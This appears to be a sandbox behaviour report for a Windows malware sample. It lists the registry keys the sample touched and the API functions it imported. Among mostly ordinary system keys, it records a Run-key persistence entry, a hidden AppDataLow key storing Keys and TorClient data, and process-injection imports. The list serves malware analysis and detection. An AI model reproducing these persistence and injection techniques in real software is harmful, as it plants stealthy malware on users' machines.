HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\Root\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\SmartCardRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPeople
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\TrustedPeople\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\TrustedPeople
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\TrustedPeople
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\TrustedPeople\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\TrustedPeople
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\CTLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\trust
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\trust\Certificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\trust\CRLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\trust\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\trust\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\trust
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\trust\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\trust
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\trust\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\trust
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Diagnostics
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserenvDebugLevel
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\GpSvcDebugLevel
HKEY_LOCAL_MACHINE\System\Setup
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\UrlDllGetObjectUrl
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\UrlDllGetObjectUrl
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\AuthRoot
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\LogLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\LogMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\LogMaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllImportPublicKeyInfoEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllImportPublicKeyInfoEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllConvertPublicKeyInfo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllConvertPublicKeyInfo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllVerifyCertificateChainPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CertDllVerifyCertificateChainPolicy
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\Escalation
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\WMR
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\79B55E88
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\WinHttpSettings
HKEY_LOCAL_MACHINE\Software\Microsoft\Ole
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\MaximumAllowedAllocationSize
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Class\{4d36e972-e325-11ce-bfc1-08002be10318}
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-0c-29-dc-04-c0
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\EnableInetUnknownAuth
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllVerifyEncodedSignature
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllVerifyEncodedSignature
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllImportPublicKeyInfoEx2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllImportPublicKeyInfoEx2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllEncodeObjectEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.1.1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.11
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.12
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.4
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Scr
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Keys
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\TorClient
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSPDY3_0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\KnownClasses
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\Interval
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\Shuffle
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\AnimationDuration
HKEY_LOCAL_MACHINE\Control Panel\Personalization\Desktop Slideshow
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\Flags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DebugHeapFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\LdapClientIntegrity
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\UseOldHostResolutionOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\UseHostnameAsAlias
DisableUserModeCallbackFilter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dnshdrt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Client
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000809
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Ini
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Temp
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextLockCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextListCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.44.3.4!7\Name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings\StringCacheGeneration
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\p2pcollab.dll,-8042
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.47.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\qagentrt.dll,-10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.64.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.2!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagMatchAnyMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableMandatoryBasicConstraints
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableCANameConstraints
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableUnsupportedCriticalExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlCountInCert
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalCountPerChain
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxUrlRetrievalByteCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalByteCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalCertCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\CryptnetPreFetchTriggerPeriodSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\EnableWeakSignatureFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\ChainCacheResyncFiletime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\109F1CAED645BB78B3EA2B94C0697C740733031C\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\D559A586669B08F46A30A133F8A9ED3D038E2EA8\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\FEE449EE0E3965A5246F000E87FDE2A065FD89D4\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs\A377D1B1C0538833035211F4083D00FECC414DAB\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\637162CC59A3A1E25956FA5FA8F60D2E1C52EAC6\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\7D7F4414CCEF168ADF6BF40753B5BECD78375931\Blob
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\ProtectedRoots\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\245C97DF7514E7CF2DF8BE72AE957B9E04741E85\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7F88CD7223F3C813818C994614A89C99FA3B5247\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\A43489159A520F0D93D032CCAF37E7FE20A8B419\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BE36A4562FB2EE05DBB3D32323ADF445084ED656\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CDD4EEAE6000AC7F40C3802C171E30148030C072\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\742C3192E607E424EB4549542BE1BBC53E6174E2\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\85371CA6E550143DCE2803471BDE3A09E8F8770F\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\97817950D81C9670CC34D809CF794431367EF474\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D23209AD23D314232174E40D7F9D62139786633A\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DE28F4A4FFE5B92FA3C503D1A349A7F9962A8212\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserenvDebugLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\GpSvcDebugLevel
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\LogLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\LogMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\LogMaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\79B55E88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\WinHttpSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\MaximumAllowedAllocationSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\EnableInetUnknownAuth
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Scr
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Keys
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\TorClient
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\Interval
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\Shuffle
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\AnimationDuration
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dnshdrt
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\LanguageList
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Temp
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Client
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSPDY3_0
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
kernel32.dll.WriteProcessMemory
kernel32.dll.HeapCreate
kernel32.dll.HeapAlloc
kernel32.dll.HeapFree
kernel32.dll.GetTickCount
ntdll.dll.RtlNtStatusToDosError
ntdll.dll.NtUnmapViewOfSection
ntdll.dll.NtMapViewOfSection
ntdll.dll.memcpy
ntdll.dll.memset
ntdll.dll.ZwClose
ntdll.dll.NtCreateSection
ntdll.dll.mbstowcs
ntdll.dll.ZwOpenProcessToken
ntdll.dll.ZwOpenProcess
ntdll.dll.ZwQueryInformationToken
ntdll.dll.NtQuerySystemInformation
ntdll.dll.RtlFreeUnicodeString
ntdll.dll.ZwQueryInformationProcess
ntdll.dll.RtlUpcaseUnicodeString
ntdll.dll.RtlUnwind
ntdll.dll.NtQueryVirtualMemory
shlwapi.dll.PathFindExtensionW
shlwapi.dll.PathFindFileNameW
shlwapi.dll.PathFindExtensionA
shlwapi.dll.StrRChrA
shlwapi.dll.StrChrA
shlwapi.dll.StrStrIA
shlwapi.dll.StrTrimW
shlwapi.dll.StrChrW
shlwapi.dll.PathFindFileNameA
shlwapi.dll.PathCombineW
setupapi.dll.SetupDiDestroyDeviceInfoList
setupapi.dll.SetupDiEnumDeviceInfo
setupapi.dll.SetupDiGetDeviceRegistryPropertyA
setupapi.dll.SetupDiGetClassDevsA
kernel32.dll.SetEvent
kernel32.dll.Sleep
kernel32.dll.GetExitCodeProcess
kernel32.dll.CreateProcessA
kernel32.dll.lstrlenW
kernel32.dll.GetLastError
kernel32.dll.GetProcAddress
kernel32.dll.ResetEvent
